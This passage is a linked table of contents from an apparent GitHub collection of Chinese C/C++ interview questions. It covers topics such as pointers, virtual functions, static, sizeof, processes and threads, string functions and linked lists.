宏定义的优缺点](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#761%E5%AE%8F%E5%AE%9A%E4%B9%89%E7%9A%84%E4%BC%98%E7%BC%BA%E7%82%B9) ##### [18.5.9 bfs和dfs如何遍历](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#762bfs%E5%92%8Cdfs%E5%A6%82%E4%BD%95%E9%81%8D%E5%8E%86) ##### [18.6.1 CPU如果访问内存?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#763cpu%E5%A6%82%E6%9E%9C%E8%AE%BF%E9%97%AE%E5%86%85%E5%AD%98) ##### [18.6.2 找出在A数组中,B数组中没有的数字,在B数组中,A数组中没有的数字](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#764%E6%89%BE%E5%87%BA%E5%9C%A8a%E6%95%B0%E7%BB%84%E4%B8%ADb%E6%95%B0%E7%BB%84%E4%B8%AD%E6%B2%A1%E6%9C%89%E7%9A%84%E6%95%B0%E5%AD%97%E5%9C%A8b%E6%95%B0%E7%BB%84%E4%B8%ADa%E6%95%B0%E7%BB%84%E4%B8%AD%E6%B2%A1%E6%9C%89%E7%9A%84%E6%95%B0%E5%AD%97) ##### [18.6.3 在C++ 程序中调用被C 编译器编译后的函数,为什么要加extern “C”?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#765%E5%9C%A8c-%E7%A8%8B%E5%BA%8F%E4%B8%AD%E8%B0%83%E7%94%A8%E8%A2%ABc-%E7%BC%96%E8%AF%91%E5%99%A8%E7%BC%96%E8%AF%91%E5%90%8E%E7%9A%84%E5%87%BD%E6%95%B0%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E5%8A%A0extern-c) ##### [18.6.4 头文件中的ifndef/define/endif有什么作用?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#766%E5%A4%B4%E6%96%87%E4%BB%B6%E4%B8%AD%E7%9A%84ifndefdefineendif%E6%9C%89%E4%BB%80%E4%B9%88%E4%BD%9C%E7%94%A8) ##### [18.6.5 #include<file.h> 与 #include "file.h"的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#767includefileh-%E4%B8%8E-include-fileh%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [18.6.6 评价一下C/C++各自的特点](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#768%E8%AF%84%E4%BB%B7%E4%B8%80%E4%B8%8Bcc%E5%90%84%E8%87%AA%E7%9A%84%E7%89%B9%E7%82%B9) ##### [18.6.7 const 有什么用途?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#769const-%E6%9C%89%E4%BB%80%E4%B9%88%E7%94%A8%E9%80%94) ##### [18.6.8 const和#define有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#770const%E5%92%8Cdefine%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [18.6.9 关于sizeof小结的。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#771%E5%85%B3%E4%BA%8Esizeof%E5%B0%8F%E7%BB%93%E7%9A%84) ##### [18.7.1 sizeof与strlen的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#772sizeof%E4%B8%8Estrlen%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [18.7.2 指针和引用的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#773%E6%8C%87%E9%92%88%E5%92%8C%E5%BC%95%E7%94%A8%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [18.7.3 数组和指针的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#774%E6%95%B0%E7%BB%84%E5%92%8C%E6%8C%87%E9%92%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [18.7.4 空指针和悬垂指针的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#775%E7%A9%BA%E6%8C%87%E9%92%88%E5%92%8C%E6%82%AC%E5%9E%82%E6%8C%87%E9%92%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [18.7.5 C++中有malloc/free,为什么还有new/delete?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#776c%E4%B8%AD%E6%9C%89mallocfree%E4%B8%BA%E4%BB%80%E4%B9%88%E8%BF%98%E6%9C%89newdelete) ##### [18.7.6 什么是智能指针?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#777%E4%BB%80%E4%B9%88%E6%98%AF%E6%99%BA%E8%83%BD%E6%8C%87%E9%92%88) ##### [18.7.7 面向对象技术的基本概念是什么,三个基本特征是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#778%E9%9D%A2%E5%90%91%E5%AF%B9%E8%B1%A1%E6%8A%80%E6%9C%AF%E7%9A%84%E5%9F%BA%E6%9C%AC%E6%A6%82%E5%BF%B5%E6%98%AF%E4%BB%80%E4%B9%88%E4%B8%89%E4%B8%AA%E5%9F%BA%E6%9C%AC%E7%89%B9%E5%BE%81%E6%98%AF%E4%BB%80%E4%B9%88) ##### [18.7.8 C++空类默认有哪些成员函数?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#779c%E7%A9%BA%E7%B1%BB%E9%BB%98%E8%AE%A4%E6%9C%89%E5%93%AA%E4%BA%9B%E6%88%90%E5%91%98%E5%87%BD%E6%95%B0) ##### [18.7.9 哪一种成员变量可以在一个类的实例之间共享?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#780%E5%93%AA%E4%B8%80%E7%A7%8D%E6%88%90%E5%91%98%E5%8F%98%E9%87%8F%E5%8F%AF%E4%BB%A5%E5%9C%A8%E4%B8%80%E4%B8%AA%E7%B1%BB%E7%9A%84%E5%AE%9E%E4%BE%8B%E4%B9%8B%E9%97%B4%E5%85%B1%E4%BA%AB) ##### [18.8.1 继承层次中,为什么基类析构函数是虚函数?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#781%E7%BB%A7%E6%89%BF%E5%B1%82%E6%AC%A1%E4%B8%AD%E4%B8%BA%E4%BB%80%E4%B9%88%E5%9F%BA%E7%B1%BB%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E6%98%AF%E8%99%9A%E5%87%BD%E6%95%B0) ##### [18.8.2 为什么构造函数不能为虚函数?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#782%E4%B8%BA%E4%BB%80%E4%B9%88%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E4%B8%8D%E8%83%BD%E4%B8%BA%E8%99%9A%E5%87%BD%E6%95%B0) ##### [18.8.3 如果虚函数是有效的,那为什么不把所有函数设为虚函数?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#783%E5%A6%82%E6%9E%9C%E8%99%9A%E5%87%BD%E6%95%B0%E6%98%AF%E6%9C%89%E6%95%88%E7%9A%84%E9%82%A3%E4%B8%BA%E4%BB%80%E4%B9%88%E4%B8%8D%E6%8A%8A%E6%89%80%E6%9C%89%E5%87%BD%E6%95%B0%E8%AE%BE%E4%B8%BA%E8%99%9A%E5%87%BD%E6%95%B0) ##### [18.8.4 什么是多态?多态有什么作用?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#784%E4%BB%80%E4%B9%88%E6%98%AF%E5%A4%9A%E6%80%81%E5%A4%9A%E6%80%81%E6%9C%89%E4%BB%80%E4%B9%88%E4%BD%9C%E7%94%A8) ##### [18.8.5 重载和覆盖有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#785%E9%87%8D%E8%BD%BD%E5%92%8C%E8%A6%86%E7%9B%96%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [18.8.6 公有继承、受保护继承、私有继承](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#786%E5%85%AC%E6%9C%89%E7%BB%A7%E6%89%BF%E5%8F%97%E4%BF%9D%E6%8A%A4%E7%BB%A7%E6%89%BF%E7%A7%81%E6%9C%89%E7%BB%A7%E6%89%BF) ##### [18.8.7 有哪几种情况只能用构造函数初始化列表而不能用赋值初始化?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#787%E6%9C%89%E5%93%AA%E5%87%A0%E7%A7%8D%E6%83%85%E5%86%B5%E5%8F%AA%E8%83%BD%E7%94%A8%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E5%88%9D%E5%A7%8B%E5%8C%96%E5%88%97%E8%A1%A8%E8%80%8C%E4%B8%8D%E8%83%BD%E7%94%A8%E8%B5%8B%E5%80%BC%E5%88%9D%E5%A7%8B%E5%8C%96) ##### [18.8.8 什么是虚指针?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#788%E4%BB%80%E4%B9%88%E6%98%AF%E8%99%9A%E6%8C%87%E9%92%88) ##### [18.8.9 C++如何阻止一个类被实例化?一般在什么时候将构造函数声明为private?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#789c%E5%A6%82%E4%BD%95%E9%98%BB%E6%AD%A2%E4%B8%80%E4%B8%AA%E7%B1%BB%E8%A2%AB%E5%AE%9E%E4%BE%8B%E5%8C%96%E4%B8%80%E8%88%AC%E5%9C%A8%E4%BB%80%E4%B9%88%E6%97%B6%E5%80%99%E5%B0%86%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E5%A3%B0%E6%98%8E%E4%B8%BAprivate) ##### [18.9.1 main函数执行之前会执行什么?执行之后还能执行代码吗?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#790main%E5%87%BD%E6%95%B0%E6%89%A7%E8%A1%8C%E4%B9%8B%E5%89%8D%E4%BC%9A%E6%89%A7%E8%A1%8C%E4%BB%80%E4%B9%88%E6%89%A7%E8%A1%8C%E4%B9%8B%E5%90%8E%E8%BF%98%E8%83%BD%E6%89%A7%E8%A1%8C%E4%BB%A3%E7%A0%81%E5%90%97) ##### [18.9.2 请描述进程和线程的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#791%E8%AF%B7%E6%8F%8F%E8%BF%B0%E8%BF%9B%E7%A8%8B%E5%92%8C%E7%BA%BF%E7%A8%8B%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [18.9.3 进程间如何通信?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#792%E8%BF%9B%E7%A8%8B%E9%97%B4%E5%A6%82%E4%BD%95%E9%80%9A%E4%BF%A1) ##### [18.9.4 在网络编程中涉及并发服务器,使用多进程与多线程的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#793%E5%9C%A8%E7%BD%91%E7%BB%9C%E7%BC%96%E7%A8%8B%E4%B8%AD%E6%B6%89%E5%8F%8A%E5%B9%B6%E5%8F%91%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%BD%BF%E7%94%A8%E5%A4%9A%E8%BF%9B%E7%A8%8B%E4%B8%8E%E5%A4%9A%E7%BA%BF%E7%A8%8B%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [18.9.5 TCP和UDP有什么区别。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#794tcp%E5%92%8Cudp%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [18.9.6 经常要操作的内存分为那几个类别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#796%E7%BB%8F%E5%B8%B8%E8%A6%81%E6%93%8D%E4%BD%9C%E7%9A%84%E5%86%85%E5%AD%98%E5%88%86%E4%B8%BA%E9%82%A3%E5%87%A0%E4%B8%AA%E7%B1%BB%E5%88%AB) ##### [18.9.7 请讲述堆和栈的区别。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#797%E8%AF%B7%E8%AE%B2%E8%BF%B0%E5%A0%86%E5%92%8C%E6%A0%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [18.9.8 全局变量放在数据段,内部变量static int count;](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#798%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E6%94%BE%E5%9C%A8%E6%95%B0%E6%8D%AE%E6%AE%B5%E5%86%85%E9%83%A8%E5%8F%98%E9%87%8Fstatic-int-count) ##### [18.9.9 类使用static成员的优点,如何访问?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#801%E7%B1%BB%E4%BD%BF%E7%94%A8static%E6%88%90%E5%91%98%E7%9A%84%E4%BC%98%E7%82%B9%E5%A6%82%E4%BD%95%E8%AE%BF%E9%97%AE) ##### [19.1.1 static数据成员和static成员函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#802static%E6%95%B0%E6%8D%AE%E6%88%90%E5%91%98%E5%92%8Cstatic%E6%88%90%E5%91%98%E5%87%BD%E6%95%B0) ##### [19.1.2 如何引用一个已经定义过的全局变量?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#804%E5%A6%82%E4%BD%95%E5%BC%95%E7%94%A8%E4%B8%80%E4%B8%AA%E5%B7%B2%E7%BB%8F%E5%AE%9A%E4%B9%89%E8%BF%87%E7%9A%84%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F) ##### [19.1.3 static关键字的作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#805static%E5%85%B3%E9%94%AE%E5%AD%97%E7%9A%84%E4%BD%9C%E7%94%A8) ##### [19.1.4 多态类中的虚函数表是 Compile-Time,还是 Run-Time时建立的?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#808%E5%A4%9A%E6%80%81%E7%B1%BB%E4%B8%AD%E7%9A%84%E8%99%9A%E5%87%BD%E6%95%B0%E8%A1%A8%E6%98%AF-compile-time%E8%BF%98%E6%98%AF-run-time%E6%97%B6%E5%BB%BA%E7%AB%8B%E7%9A%84) ##### [19.1.5 一个父类写了一个 virtual 函数,如果子类覆盖它的函数不加 virtual ,也能实现多态?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#809%E4%B8%80%E4%B8%AA%E7%88%B6%E7%B1%BB%E5%86%99%E4%BA%86%E4%B8%80%E4%B8%AA-virtual-%E5%87%BD%E6%95%B0%E5%A6%82%E6%9E%9C%E5%AD%90%E7%B1%BB%E8%A6%86%E7%9B%96%E5%AE%83%E7%9A%84%E5%87%BD%E6%95%B0%E4%B8%8D%E5%8A%A0-virtual-%E4%B9%9F%E8%83%BD%E5%AE%9E%E7%8E%B0%E5%A4%9A%E6%80%81) ##### [19.1.6 完成字符串拷贝可以使用 sprintf、strcpy 及 memcpy 函数,请问这些函数有什么区别,你喜欢使用哪个,为什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#810%E5%AE%8C%E6%88%90%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%8B%B7%E8%B4%9D%E5%8F%AF%E4%BB%A5%E4%BD%BF%E7%94%A8-sprintfstrcpy-%E5%8F%8A-memcpy-%E5%87%BD%E6%95%B0%E8%AF%B7%E9%97%AE%E8%BF%99%E4%BA%9B%E5%87%BD%E6%95%B0%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB%E4%BD%A0%E5%96%9C%E6%AC%A2%E4%BD%BF%E7%94%A8%E5%93%AA%E4%B8%AA%E4%B8%BA%E4%BB%80%E4%B9%88) ##### [19.1.7 应用程序在运行时的内存包括代码区和数据区,其中数据区又包括哪些部分?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#811%E5%BA%94%E7%94%A8%E7%A8%8B%E5%BA%8F%E5%9C%A8%E8%BF%90%E8%A1%8C%E6%97%B6%E7%9A%84%E5%86%85%E5%AD%98%E5%8C%85%E6%8B%AC%E4%BB%A3%E7%A0%81%E5%8C%BA%E5%92%8C%E6%95%B0%E6%8D%AE%E5%8C%BA%E5%85%B6%E4%B8%AD%E6%95%B0%E6%8D%AE%E5%8C%BA%E5%8F%88%E5%8C%85%E6%8B%AC%E5%93%AA%E4%BA%9B%E9%83%A8%E5%88%86) ##### [19.1.8 C++函数中值的传递方式有哪几种?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#812c%E5%87%BD%E6%95%B0%E4%B8%AD%E5%80%BC%E7%9A%84%E4%BC%A0%E9%80%92%E6%96%B9%E5%BC%8F%E6%9C%89%E5%93%AA%E5%87%A0%E7%A7%8D) ##### [19.1.9 C++里面是不是所有的动作都是main()引起的?如果不是,请举例.](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#813c%E9%87%8C%E9%9D%A2%E6%98%AF%E4%B8%8D%E6%98%AF%E6%89%80%E6%9C%89%E7%9A%84%E5%8A%A8%E4%BD%9C%E9%83%BD%E6%98%AFmain%E5%BC%95%E8%B5%B7%E7%9A%84%E5%A6%82%E6%9E%9C%E4%B8%8D%E6%98%AF%E8%AF%B7%E4%B8%BE%E4%BE%8B) ##### [19.2.1 下列哪两个是等同的](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#814%E4%B8%8B%E5%88%97%E5%93%AA%E4%B8%A4%E4%B8%AA%E6%98%AF%E7%AD%89%E5%90%8C%E7%9A%84) ##### [19.2.2 内联函数在编译时是否做参数类型检查?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#815%E5%86%85%E8%81%94%E5%87%BD%E6%95%B0%E5%9C%A8%E7%BC%96%E8%AF%91%E6%97%B6%E6%98%AF%E5%90%A6%E5%81%9A%E5%8F%82%E6%95%B0%E7%B1%BB%E5%9E%8B%E6%A3%80%E6%9F%A5) ##### [19.2.3 全局变量和局部变量有什么区别?实怎么实现的?操作系统和编译器是怎么知道的?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#816%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E5%92%8C%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB%E5%AE%9E%E6%80%8E%E4%B9%88%E5%AE%9E%E7%8E%B0%E7%9A%84%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%92%8C%E7%BC%96%E8%AF%91%E5%99%A8%E6%98%AF%E6%80%8E%E4%B9%88%E7%9F%A5%E9%81%93%E7%9A%84) ##### [19.2.4 有 A 、 B 、 C 、 D 四个人,要在夜里过一座桥。他们通过这座桥分别需要耗时 1 、 2 、 5 、 10 分钟,只有一支手电,并且同时最多只能两个人一起过桥。请问,如何安排,能够在 17 分钟内这四个人都过桥?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#817%E6%9C%89-a--b--c--d-%E5%9B%9B%E4%B8%AA%E4%BA%BA%E8%A6%81%E5%9C%A8%E5%A4%9C%E9%87%8C%E8%BF%87%E4%B8%80%E5%BA%A7%E6%A1%A5%E4%BB%96%E4%BB%AC%E9%80%9A%E8%BF%87%E8%BF%99%E5%BA%A7%E6%A1%A5%E5%88%86%E5%88%AB%E9%9C%80%E8%A6%81%E8%80%97%E6%97%B6-1--2--5--10-%E5%88%86%E9%92%9F%E5%8F%AA%E6%9C%89%E4%B8%80%E6%94%AF%E6%89%8B%E7%94%B5%E5%B9%B6%E4%B8%94%E5%90%8C%E6%97%B6%E6%9C%80%E5%A4%9A%E5%8F%AA%E8%83%BD%E4%B8%A4%E4%B8%AA%E4%BA%BA%E4%B8%80%E8%B5%B7%E8%BF%87%E6%A1%A5%E8%AF%B7%E9%97%AE%E5%A6%82%E4%BD%95%E5%AE%89%E6%8E%92%E8%83%BD%E5%A4%9F%E5%9C%A8-17-%E5%88%86%E9%92%9F%E5%86%85%E8%BF%99%E5%9B%9B%E4%B8%AA%E4%BA%BA%E9%83%BD%E8%BF%87%E6%A1%A5) ##### [19.2.5 static全局变量与普通的全局变量有什么区别?static局部变量和普通局部变量有什么区别?static函数与普通函数有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#818static%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E4%B8%8E%E6%99%AE%E9%80%9A%E7%9A%84%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%ABstatic%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F%E5%92%8C%E6%99%AE%E9%80%9A%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%ABstatic%E5%87%BD%E6%95%B0%E4%B8%8E%E6%99%AE%E9%80%9A%E5%87%BD%E6%95%B0%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [19.2.6 对于一个频繁使用的短小函数,在C语言中应用什么实现,在C++中应用什么实现?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#820%E5%AF%B9%E4%BA%8E%E4%B8%80%E4%B8%AA%E9%A2%91%E7%B9%81%E4%BD%BF%E7%94%A8%E7%9A%84%E7%9F%AD%E5%B0%8F%E5%87%BD%E6%95%B0%E5%9C%A8c%E8%AF%AD%E8%A8%80%E4%B8%AD%E5%BA%94%E7%94%A8%E4%BB%80%E4%B9%88%E5%AE%9E%E7%8E%B0%E5%9C%A8c%E4%B8%AD%E5%BA%94%E7%94%A8%E4%BB%80%E4%B9%88%E5%AE%9E%E7%8E%B0) ##### [19.2.7 有1,2,....一直到n的无序数组,求排序算法,并且要求时间复杂度为O(n),空间复杂度O(1),使用交换,而且一次只能交换两个数。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#821%E6%9C%8912%E4%B8%80%E7%9B%B4%E5%88%B0n%E7%9A%84%E6%97%A0%E5%BA%8F%E6%95%B0%E7%BB%84%E6%B1%82%E6%8E%92%E5%BA%8F%E7%AE%97%E6%B3%95%E5%B9%B6%E4%B8%94%E8%A6%81%E6%B1%82%E6%97%B6%E9%97%B4%E5%A4%8D%E6%9D%82%E5%BA%A6%E4%B8%BAon%E7%A9%BA%E9%97%B4%E5%A4%8D%E6%9D%82%E5%BA%A6o1%E4%BD%BF%E7%94%A8%E4%BA%A4%E6%8D%A2%E8%80%8C%E4%B8%94%E4%B8%80%E6%AC%A1%E5%8F%AA%E8%83%BD%E4%BA%A4%E6%8D%A2%E4%B8%A4%E4%B8%AA%E6%95%B0) ##### [19.2.8 sizeof相关系列问题, const相关系列问题](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#822sizeof%E7%9B%B8%E5%85%B3%E7%B3%BB%E5%88%97%E9%97%AE%E9%A2%98-const%E7%9B%B8%E5%85%B3%E7%B3%BB%E5%88%97%E9%97%AE%E9%A2%98) ##### [19.2.9 写出二分查找的代码](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#823%E5%86%99%E5%87%BA%E4%BA%8C%E5%88%86%E6%9F%A5%E6%89%BE%E7%9A%84%E4%BB%A3%E7%A0%81) ##### [19.3.1 写出在母串中查找子串出现次数的代码.](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#824%E5%86%99%E5%87%BA%E5%9C%A8%E6%AF%8D%E4%B8%B2%E4%B8%AD%E6%9F%A5%E6%89%BE%E5%AD%90%E4%B8%B2%E5%87%BA%E7%8E%B0%E6%AC%A1%E6%95%B0%E7%9A%84%E4%BB%A3%E7%A0%81) ##### [19.3.2 查找第一个匹配子串位置,如果返回的是s1长度len1表示没有找到](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#825%E6%9F%A5%E6%89%BE%E7%AC%AC%E4%B8%80%E4%B8%AA%E5%8C%B9%E9%85%8D%E5%AD%90%E4%B8%B2%E4%BD%8D%E7%BD%AE%E5%A6%82%E6%9E%9C%E8%BF%94%E5%9B%9E%E7%9A%84%E6%98%AFs1%E9%95%BF%E5%BA%A6len1%E8%A1%A8%E7%A4%BA%E6%B2%A1%E6%9C%89%E6%89%BE%E5%88%B0) ##### [19.3.3 实现strcpy函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#826%E5%AE%9E%E7%8E%B0strcpy%E5%87%BD%E6%95%B0) ##### [19.3.4 实现strcmp函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#827%E5%AE%9E%E7%8E%B0strcmp%E5%87%BD%E6%95%B0) ##### [19.3.5 实现字符串翻转](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#828%E5%AE%9E%E7%8E%B0%E5%AD%97%E7%AC%A6%E4%B8%B2%E7%BF%BB%E8%BD%AC) ##### [19.3.6 用指针的方法,将字符串“ABCD1234efgh”前后对调显示](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#829%E7%94%A8%E6%8C%87%E9%92%88%E7%9A%84%E6%96%B9%E6%B3%95%E5%B0%86%E5%AD%97%E7%AC%A6%E4%B8%B2abcd1234efgh%E5%89%8D%E5%90%8E%E5%AF%B9%E8%B0%83%E6%98%BE%E7%A4%BA) ##### [19.3.7 给定字符串A和B,输出A和B中的最大公共子串。比如A="aocdfe" B="pmcdfa" 则输出"cdf"](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#830%E7%BB%99%E5%AE%9A%E5%AD%97%E7%AC%A6%E4%B8%B2a%E5%92%8Cb%E8%BE%93%E5%87%BAa%E5%92%8Cb%E4%B8%AD%E7%9A%84%E6%9C%80%E5%A4%A7%E5%85%AC%E5%85%B1%E5%AD%90%E4%B8%B2%E6%AF%94%E5%A6%82aaocdfe-bpmcdfa-%E5%88%99%E8%BE%93%E5%87%BAcdf) ##### [19.3.8 判断一个字符串是不是回文](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#831%E5%88%A4%E6%96%AD%E4%B8%80%E4%B8%AA%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%98%AF%E4%B8%8D%E6%98%AF%E5%9B%9E%E6%96%87) ##### [19.3.9 写函数完成内存的拷贝](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#832%E5%86%99%E5%87%BD%E6%95%B0%E5%AE%8C%E6%88%90%E5%86%85%E5%AD%98%E7%9A%84%E6%8B%B7%E8%B4%9D) ##### [19.4.1 写一个函数,它的原形是int continumax(char *outputstr,char *intputstr)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#833%E5%86%99%E4%B8%80%E4%B8%AA%E5%87%BD%E6%95%B0%E5%AE%83%E7%9A%84%E5%8E%9F%E5%BD%A2%E6%98%AFint-continumaxchar-outputstrchar-intputstr) ##### [19.4.2 编写一个 C 函数,该函数在一个字符串中找到可能的最长的子字符串,且该字符串是由同一字符组成的](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#834%E7%BC%96%E5%86%99%E4%B8%80%E4%B8%AA-c-%E5%87%BD%E6%95%B0%E8%AF%A5%E5%87%BD%E6%95%B0%E5%9C%A8%E4%B8%80%E4%B8%AA%E5%AD%97%E7%AC%A6%E4%B8%B2%E4%B8%AD%E6%89%BE%E5%88%B0%E5%8F%AF%E8%83%BD%E7%9A%84%E6%9C%80%E9%95%BF%E7%9A%84%E5%AD%90%E5%AD%97%E7%AC%A6%E4%B8%B2%E4%B8%94%E8%AF%A5%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%98%AF%E7%94%B1%E5%90%8C%E4%B8%80%E5%AD%97%E7%AC%A6%E7%BB%84%E6%88%90%E7%9A%84) ##### [19.4.3 写出快速排序或者某种排序算法代码](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#835%E5%86%99%E5%87%BA%E5%BF%AB%E9%80%9F%E6%8E%92%E5%BA%8F%E6%88%96%E8%80%85%E6%9F%90%E7%A7%8D%E6%8E%92%E5%BA%8F%E7%AE%97%E6%B3%95%E4%BB%A3%E7%A0%81) ##### [19.4.4 将一个单链表逆序](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#836%E5%B0%86%E4%B8%80%E4%B8%AA%E5%8D%95%E9%93%BE%E8%A1%A8%E9%80%86%E5%BA%8F) ##### [19.4.5 循环链表的节点对换和删除](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#837%E5%BE%AA%E7%8E%AF%E9%93%BE%E8%A1%A8%E7%9A%84%E8%8A%82%E7%82%B9%E5%AF%B9%E6%8D%A2%E5%92%8C%E5%88%A0%E9%99%A4) ##### [19.4.6 有双向循环链表结点定义为](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#838%E6%9C%89%E5%8F%8C%E5%90%91%E5%BE%AA%E7%8E%AF%E9%93%BE%E8%A1%A8%E7%BB%93%E7%82%B9%E5%AE%9A%E4%B9%89%E4%B8%BA) ##### [19.4.7 写出程序删除链表中的所有接点](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#839%E5%86%99%E5%87%BA%E7%A8%8B%E5%BA%8F%E5%88%A0%E9%99%A4%E9%93%BE%E8%A1%A8%E4%B8%AD%E7%9A%84%E6%89%80%E6%9C%89%E6%8E%A5%E7%82%B9) ##### [19.4.8 线形表a、b为两个有序升序的线形表,编写一程序,使两个有序线形表合并成一个有序升序线形表h](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#840%E7%BA%BF%E5%BD%A2%E8%A1%A8ab%E4%B8%BA%E4%B8%A4%E4%B8%AA%E6%9C%89%E5%BA%8F%E5%8D%87%E5%BA%8F%E7%9A%84%E7%BA%BF%E5%BD%A2%E8%A1%A8%E7%BC%96%E5%86%99%E4%B8%80%E7%A8%8B%E5%BA%8F%E4%BD%BF%E4%B8%A4%E4%B8%AA%E6%9C%89%E5%BA%8F%E7%BA%BF%E5%BD%A2%E8%A1%A8%E5%90%88%E5%B9%B6%E6%88%90%E4%B8%80%E4%B8%AA%E6%9C%89%E5%BA%8F%E5%8D%87%E5%BA%8F%E7%BA%BF%E5%BD%A2%E8%A1%A8h) ##### [19.4.9 